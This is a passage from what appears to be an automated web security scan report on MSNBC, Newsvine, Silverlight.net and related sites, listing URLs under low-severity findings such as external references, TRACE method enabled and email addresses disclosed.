23.351. http://technolog.msnbc.redacted/meme

23.352. http://technolog.msnbc.redacted/microsoft

23.353. http://technolog.msnbc.redacted/motion-controls

23.354. http://technolog.msnbc.redacted/nintendo

23.355. http://technolog.msnbc.redacted/nintendo-3ds

23.356. http://technolog.msnbc.redacted/online-privacy

23.357. http://technolog.msnbc.redacted/privacy

23.358. http://technolog.msnbc.redacted/samsung

23.359. http://technolog.msnbc.redacted/science

23.360. http://technolog.msnbc.redacted/security

23.361. http://technolog.msnbc.redacted/smart-phone

23.362. http://technolog.msnbc.redacted/social-media

23.363. http://technolog.msnbc.redacted/sony

23.364. http://technolog.msnbc.redacted/steve-jobs

23.365. http://technolog.msnbc.redacted/tablets

23.366. http://technolog.msnbc.redacted/technology

23.367. http://technolog.msnbc.redacted/twitter

23.368. http://technolog.msnbc.redacted/verizon

23.369. http://technolog.msnbc.redacted/verizon-wireless

23.370. http://technolog.msnbc.redacted/video

23.371. http://technolog.msnbc.redacted/video-games

23.372. http://technolog.msnbc.redacted/viral

23.373. http://technolog.msnbc.redacted/wii

23.374. http://technolog.msnbc.redacted/wikileaks

23.375. http://technolog.msnbc.redacted/windows-phone-7

23.376. http://technolog.msnbc.redacted/xbox

23.377. http://technolog.msnbc.redacted/youtube

23.378. http://technolog2.newsvine.com/

23.379. http://thebubble.redacted/

23.380. http://theinvestedlife.redacted/

23.381. http://thelastword.msnbc.redacted/

23.382. http://timheuer.com/blog/articles/getting-started-with-silverlight-development.aspx

23.383. http://today.msnbc.redacted/

23.384. http://today.msnbc.redacted/id/37616868

23.385. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/

23.386. http://toddkenreck.newsvine.com/

23.387. http://top.newsvine.com/

23.388. http://top.newsvine.com/users

23.389. http://travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

23.390. http://trueslant.com/milesobrien/

23.391. http://tv.redacted/

23.392. http://tv.redacted/tv/article.aspx

23.393. http://twitter.com/

23.394. http://twitter.com/HelenASPopkin

23.395. http://twitter.com/MichaelWann

23.396. http://twitter.com/windabenedetti

23.397. http://twitter.com/wjrothman

23.398. http://twitter.com/wjrothman

23.399. https://twitter.com/ToddKenreck

23.400. https://twitter.com/ToddKenreck

23.401. http://video.fr.redacted/

23.402. http://video.uk.redacted/

23.403. http://redcated/CNT/iview/286609711/direct

23.404. http://redcated/CNT/iview/287065754/direct

23.405. http://redcated/NYC/iview/264935949/direct

23.406. http://visitmix.com/Labs/rosetta/eyesofblend/

23.407. http://wbenedetti.newsvine.com/

23.408. http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html

23.409. http://wonderwall.redacted/

23.410. http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery

23.411. http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story

23.412. http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story

23.413. http://wonderwall.redacted/tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story

23.414. http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

23.415. http://www.asp.net/

23.416. http://www.bing.com/shopping/content/search

23.417. http://www.bing.com/shopping/healthy-cooking/r/151

23.418. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

23.419. http://www.bing.com/travel/

23.420. http://www.bing.com/travel/content/search

23.421. http://www.bing.com/videos/browse

23.422. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

23.423. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

23.424. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

23.425. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

23.426. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

23.427. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt

23.428. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

23.429. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

23.430. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

23.431. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2

23.432. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

23.433. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

23.434. http://www.bundle.com/

23.435. http://www.collectspace.com/

23.436. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

23.437. http://www.dailygrail.com/

23.438. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

23.439. http://www.delish.com/

23.440. http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

23.441. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno

23.442. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

23.443. http://www.everyblock.com/

23.444. http://www.facebook.com/2008/fbml

23.445. http://www.facebook.com/HelenASPopkin

23.446. http://www.facebook.com/plugins/like.php

23.447. http://www.facebook.com/plugins/like.php

23.448. http://www.facebook.com/plugins/likebox.php

23.449. http://www.facebook.com/sharer.php

23.450. http://www.facebook.com/todd.kenreck

23.451. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

23.452. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

23.453. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

23.454. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

23.455. http://www.gatorade.com/default.aspx

23.456. https://www.google.com/adsense/support/bin/request.py

23.457. http://www.hobbyspace.com/

23.458. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

23.459. http://www.interactivedata-rts.com/

23.460. http://www.kanoodle.com/search_spy.html

23.461. http://www.livescience.com/

23.462. http://www.merchantcircle.com/corporate/

23.463. http://www.merchantcircle.com/corporate/503.html

23.464. http://www.redacted/

23.465. http://www.redacted/defaultwpe7.aspx

23.466. http://www.redacted/sck.aspx

23.467. http://www.redacted/worldwide.aspx

23.468. http://www.msnbc.redacted/

23.469. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games

23.470. http://www.msnbc.redacted/id/26315908/vp=41321791&

23.471. http://www.msnbc.redacted/id/26613008/

23.472. http://www.msnbc.redacted/id/27365695/

23.473. http://www.msnbc.redacted/id/3032072/ns/business

23.474. http://www.msnbc.redacted/id/3032076/ns/health

23.475. http://www.msnbc.redacted/id/3032118/ns/technology_and_science

23.476. http://www.msnbc.redacted/id/3032507/ns/world_news

23.477. http://www.msnbc.redacted/id/3032525/ns/us_news

23.478. http://www.msnbc.redacted/id/3032553/ns/politics

23.479. http://www.msnbc.redacted/id/3032619/ns/nightly_news/

23.480. http://www.msnbc.redacted/id/3032619/vp/41328231

23.481. http://www.msnbc.redacted/id/3053415/

23.482. http://www.msnbc.redacted/id/3303511/

23.483. http://www.msnbc.redacted/id/3303540/

23.484. http://www.msnbc.redacted/id/37643077

23.485. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/

23.486. http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science

23.487. http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/

23.488. http://www.msnbc.redacted/id/41316837/ns/world_news-mideastn_africa/

23.489. http://www.msnbc.redacted/id/41317259/ns/politics

23.490. http://www.msnbc.redacted/id/41317259/ns/politics

23.491. http://www.msnbc.redacted/id/41317259/ns/politics/

23.492. http://www.msnbc.redacted/id/41317259/ns/politics/

23.493. http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets

23.494. http://www.msnbc.redacted/id/41321565/ns/business/

23.495. http://www.msnbc.redacted/id/41322367/ns/local_news-dallasfort_worth_tx/

23.496. http://www.msnbc.redacted/id/41322659/ns/local_news-dallasfort_worth_tx/

23.497. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa

23.498. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/

23.499. http://www.msnbc.redacted/id/41324031

23.500. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia

23.501. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/

23.502. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news

23.503. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news/

23.504. http://www.msnbc.redacted/id/41324877/ns/world_news-europe

23.505. http://www.msnbc.redacted/id/41324877/ns/world_news-europe/

23.506. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/

23.507. http://www.msnbc.redacted/id/41326559/ns/local_news-dallasfort_worth_tx/

23.508. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia

23.509. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/

23.510. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/

23.511. http://www.msnbc.redacted/id/41327694/ns/us_news/

23.512. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/

23.513. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/

23.514. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/

23.515. http://www.msnbc.redacted/id/41328059/ns/us_news/

23.516. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/

23.517. http://www.msnbc.redacted/id/41329947/ns/us_news-crime_and_courts/

23.518. http://www.msnbc.redacted/id/41330515/ns/us_news-life/

23.519. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/

23.520. http://www.msnbc.redacted/id/8004316/

23.521. http://www.myhomeredacted/

23.522. http://www.nasawatch.com/

23.523. http://www.neudesicmediagroup.com/Advertising.aspx

23.524. http://www.newsvine.com/

23.525. http://www.newsvine.com/_tools/user/login

23.526. https://www.newsvine.com/

23.527. https://www.newsvine.com/_nv/accounts/login

23.528. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

23.529. https://www.newsvine.com/_nv/accounts/register

23.530. http://www.opensource.org/licenses/gpl-license.php

23.531. http://www.opensource.org/licenses/mit-license.php

23.532. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

23.533. http://www.outofthecradle.net/

23.534. http://www.pcmag.com/&|http:/www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

23.535. http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

23.536. http://www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

23.537. http://www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

23.538. http://www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

23.539. http://www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

23.540. http://www.polls.newsvine.com/

23.541. http://www.polls.newsvine.com/_labs/archive

23.542. http://www.polls.newsvine.com/_nv/cms/backyard/greenhouse

23.543. http://www.polls.newsvine.com/_nv/cms/backyard/tools

23.544. http://www.polls.newsvine.com/_nv/cms/help/faq

23.545. http://www.polls.newsvine.com/_nv/cms/info/codeOfHonor

23.546. http://www.polls.newsvine.com/_nv/cms/info/companyInfo

23.547. http://www.polls.newsvine.com/_nv/cms/info/contact

23.548. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy

23.549. http://www.polls.newsvine.com/_nv/cms/info/jobs

23.550. http://www.polls.newsvine.com/_nv/cms/info/privacyPolicy

23.551. http://www.polls.newsvine.com/_nv/cms/info/userAgreement

23.552. http://www.polls.newsvine.com/_nv/cms/welcome

23.553. http://www.polls.newsvine.com/_vine/a

23.554. http://www.polls.newsvine.com/_vine/search

23.555. http://www.polls.newsvine.com/arts

23.556. http://www.polls.newsvine.com/business

23.557. http://www.polls.newsvine.com/education

23.558. http://www.polls.newsvine.com/entertainment

23.559. http://www.polls.newsvine.com/environment

23.560. http://www.polls.newsvine.com/fashion

23.561. http://www.polls.newsvine.com/health

23.562. http://www.polls.newsvine.com/history

23.563. http://www.polls.newsvine.com/home-garden

23.564. http://www.polls.newsvine.com/not-news

23.565. http://www.polls.newsvine.com/odd-news

23.566. http://www.polls.newsvine.com/politics

23.567. http://www.polls.newsvine.com/religion

23.568. http://www.polls.newsvine.com/science

23.569. http://www.polls.newsvine.com/sports

23.570. http://www.polls.newsvine.com/technology

23.571. http://www.polls.newsvine.com/travel

23.572. http://www.polls.newsvine.com/us-news

23.573. http://www.polls.newsvine.com/world-news

23.574. http://www.popsci.com/

23.575. http://www.popularmechanics.com/

23.576. http://www.reuters.com/

23.577. http://www.sciencenews.org/

23.578. http://www.scientificamerican.com/blog/observations/

23.579. http://www.scientificamerican.com/errors/404.cfm

23.580. http://www.scout.com/

23.581. http://www.scout.com/3/college-links.html

23.582. http://www.scout.com/3/company.html

23.583. http://www.scout.com/3/fair-use.html

23.584. http://www.scout.com/3/jobs.html

23.585. http://www.scout.com/3/privacy-policy.html

23.586. http://www.scout.com/3/recruiting-links.html

23.587. http://www.scout.com/3/security-information.html

23.588. http://www.scout.com/3/terms-of-service.html

23.589. http://www.scout.com/a.z

23.590. http://www.scout.com/search.aspx

23.591. http://www.scout.com/widgets/

23.592. http://www.signonsandiego.com/news/blogs/science-quest/

23.593. http://www.silverlight.net/

23.594. http://www.silverlight.net/adchain.html

23.595. http://www.silverlight.net/community/

23.596. http://www.silverlight.net/community/blogarchive/silverlight/1/

23.597. http://www.silverlight.net/community/recognition/

23.598. http://www.silverlight.net/community/recognition/halloffame.aspx

23.599. http://www.silverlight.net/community/samples/featured/telerik-facedeck/

23.600. http://www.silverlight.net/community/samples/silverlight-samples/

23.601. http://www.silverlight.net/community/samples/silverlight-samples/animated-note-control-37395/

23.602. http://www.silverlight.net/community/samples/silverlight-samples/babysmash7-wp7-app-37425/

23.603. http://www.silverlight.net/community/samples/silverlight-samples/childwindow-effects-37469/

23.604. http://www.silverlight.net/community/samples/silverlight-samples/fill-background-with-patterns--texture-37396/

23.605. http://www.silverlight.net/community/samples/silverlight-samples/infragistics-xamgrid-37452/

23.606. http://www.silverlight.net/community/samples/silverlight-samples/rated/

23.607. http://www.silverlight.net/community/samples/silverlight-samples/simple-but-cool-silverlight-messageboxes-37444/

23.608. http://www.silverlight.net/community/samples/upload/

23.609. http://www.silverlight.net/contact.aspx

23.610. http://www.silverlight.net/getstarted/

23.611. http://www.silverlight.net/getstarted/devices/details.aspx

23.612. http://www.silverlight.net/getstarted/devices/symbian/

23.613. http://www.silverlight.net/getstarted/devices/windows-phone/

23.614. http://www.silverlight.net/getstarted/overview.aspx

23.615. http://www.silverlight.net/learn/

23.616. http://www.silverlight.net/learn/books/

23.617. http://www.silverlight.net/learn/dynamic-languages/

23.618. http://www.silverlight.net/learn/handsonlabs/

23.619. http://www.silverlight.net/learn/international/

23.620. http://www.silverlight.net/learn/pivotviewer/

23.621. http://www.silverlight.net/learn/quickstarts/

23.622. http://www.silverlight.net/learn/tutorials/jesse-liberty/general-tutorials/

23.623. http://www.silverlight.net/learn/tutorials/silverlight-4/

23.624. http://www.silverlight.net/learn/tutorials/silverlight-4/advanced-silverlight-out-of-browser-introduction/

23.625. http://www.silverlight.net/learn/tutorials/silverlight-4/aspnet-and-silverlight/

23.626. http://www.silverlight.net/learn/tutorials/silverlight-4/using-the-mvvm-pattern-in-silverlight-applications/

23.627. http://www.silverlight.net/learn/tutorials/silverlight-4/using-wcf-ria-services/

23.628. http://www.silverlight.net/learn/tutorials/windows-phone/

23.629. http://www.silverlight.net/learn/videos/all/build-your-first-desktop-ria-application-with-silverlight/

23.630. http://www.silverlight.net/learn/videos/all/build-your-first-silverlight-web-application/

23.631. http://www.silverlight.net/learn/videos/expression/

23.632. http://www.silverlight.net/learn/videos/indonesian-videos/

23.633. http://www.silverlight.net/learn/videos/japanese-videos/

23.634. http://www.silverlight.net/learn/videos/lyndacom-silverlight-essential-training/

23.635. http://www.silverlight.net/learn/videos/silverlight-4-videos/

23.636. http://www.silverlight.net/learn/videos/silverlight-media-framework/

23.637. http://www.silverlight.net/learn/videos/silverlight-videos/

23.638. http://www.silverlight.net/learn/videos/spanish-videos/

23.639. http://www.silverlight.net/privacy.aspx

23.640. http://www.silverlight.net/showcase/

23.641. http://www.silverlight.net/termsofuse.aspx

23.642. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

23.643. http://www.slate.com/id/2282444/

23.644. http://www.space.com/

23.645. http://www.spacedaily.com/

23.646. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

23.647. http://www.thespacereview.com/

23.648. http://www.theworkbuzz.com/employment-trends/video-interviews/

23.649. http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/

23.650. http://www.ticketcity.com/

23.651. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

23.652. http://www.transterrestrial.com/

23.653. http://www.unica.com/

23.654. http://www.unmannedspaceflight.com/

23.655. http://www.walmart.com/cp/Electronics/3944

23.656. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

23.657. http://www.youtube.com/embed/CKZzn00w01M

23.658. http://www.youtube.com/embed/mm8byzo8zWE

23.659. http://www.zacks.com/

23.660. http://www.zacks.com/

23.661. http://www.zacks.com/

23.662. http://www.zacks.com/

24. File upload functionality

25. TRACE method is enabled

25.1. http://advertising.aol.com/

25.2. http://amch.questionmarket.com/

25.3. http://atl.whitepages.com/

25.4. http://bassistance.de/

25.5. http://blogs.discovermagazine.com/

25.6. http://erik.eae.net/

25.7. http://eurekalert.org/

25.8. http://javascript.nwbox.com/

25.9. http://jquery.org/

25.10. http://msnbcmedia.redacted/

25.11. http://nasaengineer.com/

25.12. http://planetary.org/

25.13. http://seedmagazine.com/

25.14. http://trueslant.com/

25.15. http://widgets.digg.com/

25.16. http://www.aim.com/

25.17. http://www.batstrading.com/

25.18. http://www.cannex.com/

25.19. http://www.dooce.com/

25.20. http://www.interactivedata-rts.com/

25.21. http://www.mozilla.org/

25.22. http://www.popsci.com/

25.23. http://www.scienceblogs.com/

25.24. http://www.sciencenews.org/

25.25. http://www.six-telekurs.com/

25.26. http://www.spacedaily.com/

25.27. http://www.stylemepretty.com/

25.28. http://www.terra.com/

25.29. http://www.thespacereview.com/

25.30. http://www.transterrestrial.com/

25.31. http://www.unmannedspaceflight.com/

25.32. http://www.zacks.com/

26. Email addresses disclosed

26.1. http://ads.redacted/library/dap.js

26.2. http://ads1.redacted/library/dap.js

26.3. http://ads1.redacted/library/dapbeta.js

26.4. http://alex-johnson.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

26.5. http://athima-chansanchai.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

26.6. http://bassistance.de/jquery-plugins/jquery-plugin-validation/

26.7. http://blogs.discovermagazine.com/loom/

26.8. http://bodyodd.msnbc.redacted/

26.9. http://boyle.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

26.10. http://cosmiclog.msnbc.redacted/

26.11. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

26.12. http://curmudgeons.blogspot.com/

26.13. http://docs.jquery.com/Plugins/Validation

26.14. http://editorial.autos.redacted/blogs/autosblog.aspx

26.15. http://fancybox.net/

26.16. http://forums.silverlight.net/forums/19.aspx

26.17. http://forums.silverlight.net/forums/65.aspx

26.18. http://helenaspopkin.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

26.19. http://i1.codeplex.com/scripts/v17501/i1879048191/ScriptLoader.ashx

26.20. http://i2.silverlight.net/resources/script/omniture/s_code_dotnet.min.js

26.21. http://images.hoovers.com/dc/js/omniture/s_code.js

26.22. http://informationarbitrage.com/api/read/json

26.23. http://informationarbitrage.com/api/read/json

26.24. http://informationarbitrage.com/api/read/json

26.25. http://informationarbitrage.com/api/read/json

26.26. http://jqueryui.com/about

26.27. http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js

26.28. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

26.29. http://login.live.com/login.srf

26.30. https://login.live.com/login.srf

26.31. https://login.live.com/pp900/

26.32. https://login.live.com/ppsecure/post.srf

26.33. https://login.live.com/ppsecure/secure.srf

26.34. https://login.silverlight.net/resources/script/omniture/omniture.combined.min.js

26.35. http://mediacdn.disqus.com/1296297835/build/system/disqus.js

26.36. http://mediacdn.disqus.com/1296297835/js/dist/lib.js

26.37. http://money.redacted/common/welcome-to-the-new-msn-money.aspx

26.38. http://money.redacted/currency/2011-the-year-of-wild-speculation-fleckenstein.aspx

26.39. http://money.redacted/how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx

26.40. http://money.redacted/investing/10-reasons-to-love-rising-prices-jubak.aspx

26.41. http://money.redacted/mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx

26.42. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

26.43. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

26.44. https://msnia.login.live.com/ppsecure/post.srf

26.45. http://news.sciencemag.org/scienceinsider/

26.46. http://openchannel.msnbc.redacted/

26.47. http://recruiting.scout.com/

26.48. http://redtape.msnbc.com/

26.49. http://rss.scout.com/rss.aspx

26.50. http://science.slashdot.org/

26.51. https://secure.shared.live.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js

26.52. http://sstatic.net/Js/third-party/jquery.typewatch.js

26.53. http://sstatic.net/Js/third-party/openid-jquery.js

26.54. http://sstatic.net/Js/wmd.js

26.55. http://sstatic.net/js/master.min.js

26.56. http://sstatic.net/js/question.js

26.57. http://sstatic.net/openid.css

26.58. http://sstatic.net/stackoverflow/all.css

26.59. http://sstatic.net/stackoverflow/img/favicon.ico

26.60. http://stackoverflow.com/

26.61. http://stackoverflow.com/posts/4843433/ivc/3344

26.62. http://stackoverflow.com/questions

26.63. http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url

26.64. http://stackoverflow.com/tags

26.65. http://stackoverflow.com/users

26.66. http://stackoverflow.com/users/login

26.67. http://stackoverflow.com/users/login/global/request

26.68. http://technolog.msnbc.redacted/security

26.69. http://technolog.msnbc.redacted/video

26.70. http://technolog.msnbc.redacted/viral

26.71. http://technolog.msnbc.redacted/youtube

26.72. http://thelastword.msnbc.redacted/

26.73. http://timheuer.com/blog/articles/getting-started-with-silverlight-development.aspx

26.74. http://today.msnbc.redacted/id/37616868

26.75. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/

26.76. http://wbenedetti.newsvine.com/_util/spellcheck/broken-notebook-2.6/cpaint2.inc.compressed.js

26.77. http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html

26.78. http://www.bing.com/s/osd3.xml

26.79. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

26.80. http://www.bloglines.com/contact/

26.81. http://www.bloglines.com/js/r200702160/bl/home.js

26.82. http://www.collectspace.com/

26.83. http://www.dailygrail.com/

26.84. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno

26.85. http://www.everyblock.com/

26.86. http://www.gnu.org/licenses/gpl.html

26.87. http://www.hobbyspace.com/

26.88. http://www.msnbc.redacted/id/3032118/ns/technology_and_science

26.89. http://www.msnbc.redacted/id/32359544/

26.90. http://www.msnbc.redacted/id/3303511/

26.91. http://www.msnbc.redacted/id/3303540/

26.92. http://www.msnbc.redacted/id/37643077

26.93. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/

26.94. http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science

26.95. http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/

26.96. http://www.msnbc.redacted/id/41316837/ns/world_news-mideastn_africa/

26.97. http://www.msnbc.redacted/id/41317259/ns/politics

26.98. http://www.msnbc.redacted/id/41317259/ns/politics/

26.99. http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets

26.100. http://www.msnbc.redacted/id/41321565/ns/business/

26.101. http://www.msnbc.redacted/id/41322367/ns/local_news-dallasfort_worth_tx/

26.102. http://www.msnbc.redacted/id/41322659/ns/local_news-dallasfort_worth_tx/

26.103. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa

26.104. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/

26.105. http://www.msnbc.redacted/id/41324031

26.106. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia

26.107. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/

26.108. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news

26.109. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news/

26.110. http://www.msnbc.redacted/id/41324877/ns/world_news-europe

26.111. http://www.msnbc.redacted/id/41324877/ns/world_news-europe/

26.112. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/

26.113. http://www.msnbc.redacted/id/41326559/ns/local_news-dallasfort_worth_tx/

26.114. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia

26.115. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/

26.116. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/

26.117. http://www.msnbc.redacted/id/41327694/ns/us_news/

26.118. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/

26.119. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/

26.120. http://www.msnbc.redacted/id/41328059/ns/us_news/

26.121. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/

26.122. http://www.msnbc.redacted/id/41329947/ns/us_news-crime_and_courts/

